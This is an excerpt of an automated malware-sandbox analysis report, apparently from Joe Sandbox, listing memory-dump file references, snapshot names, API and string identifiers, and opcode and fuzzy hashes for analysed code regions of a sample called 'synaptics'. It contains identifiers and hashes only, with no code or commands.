                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C8FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C900000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C903000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C905000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C907000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C909000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c6e0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Time$System$File
                                                                                                                                                                                                                                    • String ID: gfff
                                                                                                                                                                                                                                    • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                    • Opcode ID: 047bb1f4c20ea0537b7371ffa004ddf89e21eaac5ca0320fc93cfe2981028a79
                                                                                                                                                                                                                                    • Instruction ID: 3f5f911cc10f7409e0d73946d2325d8dda32f1b2aaa48fe6f4da1c9db3d01c93
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 047bb1f4c20ea0537b7371ffa004ddf89e21eaac5ca0320fc93cfe2981028a79
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF216D717083064BC708DE6DE894A5AB7E9ABCC214F04493EB599C7351EB35D8098796
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2118561607.000000006C691000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C691000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c691000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: @Mjl$HOjl$HOjl$Mjl
                                                                                                                                                                                                                                    • API String ID: 0-3687717885
                                                                                                                                                                                                                                    • Opcode ID: a1ba6af4f4509010571aa1ddca266b195a124a1e0b11643388d255f44a04d332
                                                                                                                                                                                                                                    • Instruction ID: b41049bb60352e239e763006f1580ba6231c740519e02f8230d8602e6fe827eb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1ba6af4f4509010571aa1ddca266b195a124a1e0b11643388d255f44a04d332
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5A131729846158FEB008FA5D880266B7F5EF47348F191279DC9D9B712EB71E803CB89